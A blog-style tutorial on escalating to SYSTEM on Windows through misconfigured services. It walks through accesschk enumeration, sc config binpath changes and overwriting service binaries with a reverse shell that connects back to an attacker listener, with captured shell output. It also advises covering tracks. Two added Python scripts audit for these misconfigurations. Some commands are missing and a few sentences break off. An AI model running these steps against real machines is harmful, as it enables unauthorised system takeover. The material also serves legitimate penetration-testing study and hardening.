There are many ways to take advantage of incorrectly configured services to escalate your privileges on a Windows machine.
The types of incorrect configurations I'm going to look at today are the following:
- Insecure Service Properties
- Unquoted Service Paths
- Weak Registry Permissions
- Insecure Service Executables
Since this is a post about privilege escalation, it is assumed that you already have access to the target machine as a normal user with basic privileges and can execute commands in either cmd.exe or PowerShell.
Many of these exploits rely on replacing the binary that the service runs with one of our own. To generate our own reverse-shell binary, we can use a tool called msfvenom, which is installed as part of the Metasploit Framework.
In order to generate a reverse shell to my machine, I run the following command:
This outputs a reverse.exe file which will attempt to connect back to my machine at 192.168.1.20 on port 4444. I can listen for this using ncat on my attacking machine.
┌──(gareth㉿enso)-[~/Desktop/Files]
└─$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Now that we have our binary, we need to get it, along with some tools to help us, onto the target machine somehow.
To find these incorrect configurations it is useful to have some tools on the machine that can help with enumerating the system.
Assuming you have a reverse shell as a user with normal privileges, you may need to "live off the land" and use existing Windows binaries to download your tools.
I like to use certutil.exe. To download files onto a Windows box from the command line using certutil.exe, you can execute the following:
The previous command downloads a batch file called winPEAS, which is short for "Windows Privilege Escalation Awesome Script". This script is great and can automatically find many avenues open to exploitation, including potentially vulnerable service configurations. To find these incorrectly configured services, you can run:
C:\Users\bob\Desktop> .\winPEAS.bat quiet servicesinfo
accesschk.exe is a Windows Sysinternals tool that can be used to check your access to various Windows resources, such as files, services or directories. While this tool may already live on the machine, an older version is required in order to run it in command-line-only mode.
Insecure Service Properties
Each service on a Windows machine has an ACL (Access Control List) which defines certain service-specific permissions. If our user has the following ACL permissions, then we should be able to escalate our privileges.
To check whether our user has these permissions, we can use the aforementioned accesschk.exe:
C:> accesschk.exe /accepteula -uwcqv <username> <svcname>
RW <svcname>
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_CHANGE_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
In this example we can see that we have permission to change the service configuration and to stop and start the service. This should be enough to escalate our privileges, assuming the service is running as a privileged account. To check this, we can run the sc qc <svcname> command.
C:> sc qc daclsvc
SERVICE_NAME: daclsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files\DACL Service\daclservice.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : DACL Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
We can see that this service is running as the LocalSystem account, which is a privileged account.
Because we have the SERVICE_CHANGE_CONFIG permission, we can simply stop the service, change the binary it will run to point to our reverse shell, and start it again.
C:\PrivEsc>net stop daclsvc
The DACL Service service was stopped successfully.
C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\""
[SC] ChangeServiceConfig SUCCESS
C:\PrivEsc>net start daclsvc
On my attacking machine, I can see that I now have access to the target machine as a privileged account.
┌──(gareth㉿enso)-[~/Desktop/Files]
└─$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.203 49939
Microsoft Windows [Version 10.0.17763.1935]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Unquoted Service Paths
This exploit takes advantage of the scenario where the path to the legitimate application has not been enclosed in quotation marks (" characters). For example, if we check the configuration of the following service:
C:\PrivEsc>sc qc unquotedsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: unquotedsvc
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Unquoted Path Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
We can see that the BINARY_PATH_NAME property is not enclosed in quotes.
This is a problem because executable files in Windows can be run without their extension (e.g. whoami.exe can be run by just typing whoami) and some executables take arguments separated by spaces, e.g. someprogram.exe arg1 arg2. This behaviour leads to ambiguity when using absolute paths that are unquoted and contain spaces.
A service with the unquoted path C:\Program Files\Some Dir\SomeProgram.exe, for example, could be interpreted as any of:
- C:\Program.exe Files\Some Dir\SomeProgram.exe (2 args)
- C:\Program Files\Some.exe Dir\SomeProgram.exe (1 arg)
- C:\Program Files\Some Dir\SomeProgram.exe (0 args)
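The following script is an added example (not from the original post) that works out, for a BINARY_PATH_NAME as printed by sc qc, which files Windows would try before the real binary and therefore which directories must not be writable by ordinary users; it goes beyond the post's example by also handling quoted paths and unquoted paths that carry arguments after the .exe. The path values are constructed, modelled on the post's unquotedsvc and daclsvc.

```python
import ntpath
import re

# Constructed BINARY_PATH_NAME values in the form "sc qc" prints them, modelled on
# the page's unquotedsvc and daclsvc (not captured from a real host).
UNQUOTED = r"C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe"
QUOTED = r'"C:\Program Files\DACL Service\daclservice.exe"'
WITH_ARGS = r"C:\Windows\system32\svchost.exe -k netsvcs -p"

EXE_END = re.compile(r"\.exe(?=\s|$)", re.IGNORECASE)

def split_image_path(binary_path: str) -> tuple:
    """Return (executable_path, was_quoted). In an unquoted path the executable
    ends at the first '.exe' token; anything after it is arguments (e.g. -k netsvcs)."""
    p = binary_path.strip()
    if p.startswith('"'):
        end = p.find('"', 1)
        return (p[1:end] if end != -1 else p[1:]), True
    m = EXE_END.search(p)
    return (p[:m.end()] if m else p.split(" ")[0]), False

def hijack_candidates(binary_path: str) -> list:
    """Files CreateProcess would try, in order, for an unquoted path containing
    spaces: the prefix before each space plus '.exe', then the real binary.
    An empty list means the path is unambiguous (quoted, or no spaces in it)."""
    exe, quoted = split_image_path(binary_path)
    if quoted or " " not in exe:
        return []
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "] + [exe]

def dirs_to_protect(binary_path: str) -> list:
    """Directories that must not be writable by ordinary users: a file planted in
    any of them would run in place of the service binary (deduplicated, in order)."""
    dirs = []
    for cand in hijack_candidates(binary_path)[:-1]:
        d = ntpath.dirname(cand)
        if d not in dirs:
            dirs.append(d)
    return dirs

if __name__ == "__main__":
    for path in (UNQUOTED, QUOTED, WITH_ARGS):
        print(path)
        print("  candidates:", hijack_candidates(path))
        print("  lock down :", dirs_to_protect(path))
```

For the unquoted sample the fourth candidate is C:\Program Files\Unquoted Path Service\Common.exe, exactly the file the post goes on to plant, and the directory list is what an audit should check for write access by BUILTIN\Users or Everyone.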
To take advantage of this scenario, we need to be able to write to one of these folder locations and to stop and start the service. We can use accesschk to check whether we have permission to start/stop the service and write access to a directory in the path:
C:\PrivEsc>.\accesschk.exe /accepteula -ucqv user unquotedsvc
R  unquotedsvc
        SERVICE_QUERY_STATUS
        SERVICE_QUERY_CONFIG
        SERVICE_INTERROGATE
        SERVICE_ENUMERATE_DEPENDENTS
        SERVICE_START
        SERVICE_STOP
        READ_CONTROL
C:\PrivEsc>.\accesschk.exe /accepteula -uwdq C:\
C:\
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Administrators
  RW NT AUTHORITY\SYSTEM
C:\PrivEsc>.\accesschk.exe /accepteula -uwdq "C:\Program Files"
C:\Program Files
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
C:\PrivEsc>.\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service"
C:\Program Files\Unquoted Path Service
  Medium Mandatory Level (Default) [No-Write-Up]
  RW BUILTIN\Users
  RW NT SERVICE\TrustedInstaller
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators
We see that we have start/stop permissions and that members of the BUILTIN\Users group have write access to the Unquoted Path Service directory. This should allow us to take advantage of the aforementioned ambiguity by creating a Common.exe file in that directory, tricking Windows into running our shell rather than looking one step further down, in the Common Files directory, for an
I'm going to stop the service, copy my reverse.exe file from earlier into the Unquoted Path Service directory, rename it to Common.exe and then start the service again.
I set up a listener on the attacking machine before starting the service.
Weak Registry Permissions
The Windows registry stores an entry for each service. Since registry entries have ACLs of their own, an incorrectly configured ACL may let us modify a service's configuration even when we cannot modify the service directly.
Check the registry entry's access as follows:
C:\PrivEsc>.\accesschk.exe /accepteula -uvwqk HKLM:\System\CurrentControlSet\Services\regsvc
HKLM\System\CurrentControlSet\Services\regsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        KEY_ALL_ACCESS
  RW BUILTIN\Administrators
        KEY_ALL_ACCESS
  RW NT AUTHORITY\INTERACTIVE
        KEY_ALL_ACCESS
Since our current user is a member of NT AUTHORITY\INTERACTIVE, we have write permission to this registry entry, for the
We can use this permission to overwrite the ImagePath value in the service's registry key so that it points to our own executable. Again, we must also have permission to start/stop the service.
Insecure Service Executables
Sometimes our basic user account simply has permission to overwrite the executable that the service is configured to run. In this case it is a matter of stopping the service, copying the legitimate binary somewhere else, copying our binary in its place, and starting the service again.
Keeping a backup of the original binary is a good idea to help cover our tracks after we have finished exploiting the machine.
C:\PrivEsc>.\accesschk.exe /accepteula -quwv "C:\Program Files\File Permissions Service\filepermservice.exe"
C:\Program Files\File Permissions Service\filepermservice.exe
  Medium Mandatory Level (Default) [No-Write-Up]
  RW Everyone
        FILE_ALL_ACCESS
  RW NT AUTHORITY\SYSTEM
        FILE_ALL_ACCESS
  RW BUILTIN\Administrators
        FILE_ALL_ACCESS
  RW BUILTIN\Users
        FILE_ALL_ACCESS
C:\PrivEsc>copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp
        1 file(s) copied.
C:\PrivEsc>copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe"
        1 file(s) copied.
C:\PrivEsc>net start filepermsvc
The service is not responding to the control function.
On the attacking machine:
┌──(gareth㉿enso)-[~/Desktop]
└─$ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 192.168.1.203 50073
Microsoft Windows [Version 10.0.17763.1935]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
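The three accesschk checks above (service permissions, the service's registry key, and the service executable) all come down to the same question: does a low-privileged principal hold a right that lets it change what the service runs? The following is an added audit helper, not code from the original post, that parses accesschk's verbose output (the form without a -u filter, where each principal is listed) and reports such grants. The sample output and the list of low-privileged principals are constructed, modelled on the post's daclsvc output.

```python
import re

# Principals every ordinary user effectively belongs to (constructed list; extend
# with domain groups such as Domain Users when auditing a domain-joined host).
LOW_PRIV = {"everyone", r"builtin\users", r"nt authority\authenticated users",
            r"nt authority\interactive"}
# Rights that let the holder change what a service executes, per object kind.
DANGEROUS = {
    "service": {"SERVICE_CHANGE_CONFIG", "SERVICE_ALL_ACCESS", "WRITE_DAC", "WRITE_OWNER"},
    "file": {"FILE_ALL_ACCESS", "FILE_WRITE_DATA", "FILE_APPEND_DATA", "DELETE",
             "WRITE_DAC", "WRITE_OWNER"},
    "key": {"KEY_ALL_ACCESS", "KEY_SET_VALUE", "WRITE_DAC", "WRITE_OWNER"},
}

# Constructed sample in the shape "accesschk -cqv <svc>" prints without a -u filter,
# modelled on the page's daclsvc; not captured from a real host.
SERVICE_SAMPLE = """\
daclsvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\\INTERACTIVE
        SERVICE_CHANGE_CONFIG
        SERVICE_START
        SERVICE_STOP
"""

def parse_accesschk(text: str) -> dict:
    """Map each 'R/W/RW <principal>' header to the set of right names indented under it."""
    acl, current = {}, None
    for line in text.splitlines():
        head = re.match(r"^\s*(?:RW|R|W)\s+(\S.*?)\s*$", line)
        right = re.match(r"^\s+([A-Z_]+)\s*$", line)
        if head:
            current = head.group(1)
            acl.setdefault(current, set())
        elif right and current:
            acl[current].add(right.group(1))
    return acl

def risky_grants(text: str, kind: str) -> dict:
    """Low-privileged principals holding a DANGEROUS right for this object kind."""
    return {who: sorted(rights & DANGEROUS[kind])
            for who, rights in parse_accesschk(text).items()
            if who.lower() in LOW_PRIV and rights & DANGEROUS[kind]}

if __name__ == "__main__":
    print(risky_grants(SERVICE_SAMPLE, "service"))
```

Feed it the output of accesschk -v against a service (kind "service"), its HKLM\System\CurrentControlSet\Services\<svc> key (kind "key") or its binary (kind "file"); any non-empty result is a finding to fix by tightening that object's ACL.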
These are just some of the ways to gain escalated privileges on an incorrectly configured Windows 10 machine. If you have the ability to stop and start a service, and some kind of permission to alter or replace the service executable, you can usually take advantage of it and escalate your privileges, either horizontally or vertically.
To learn more about Windows privilege escalation I highly recommend a Udemy course by tib3rius called Windows Privilege Escalation for OSCP and Beyond!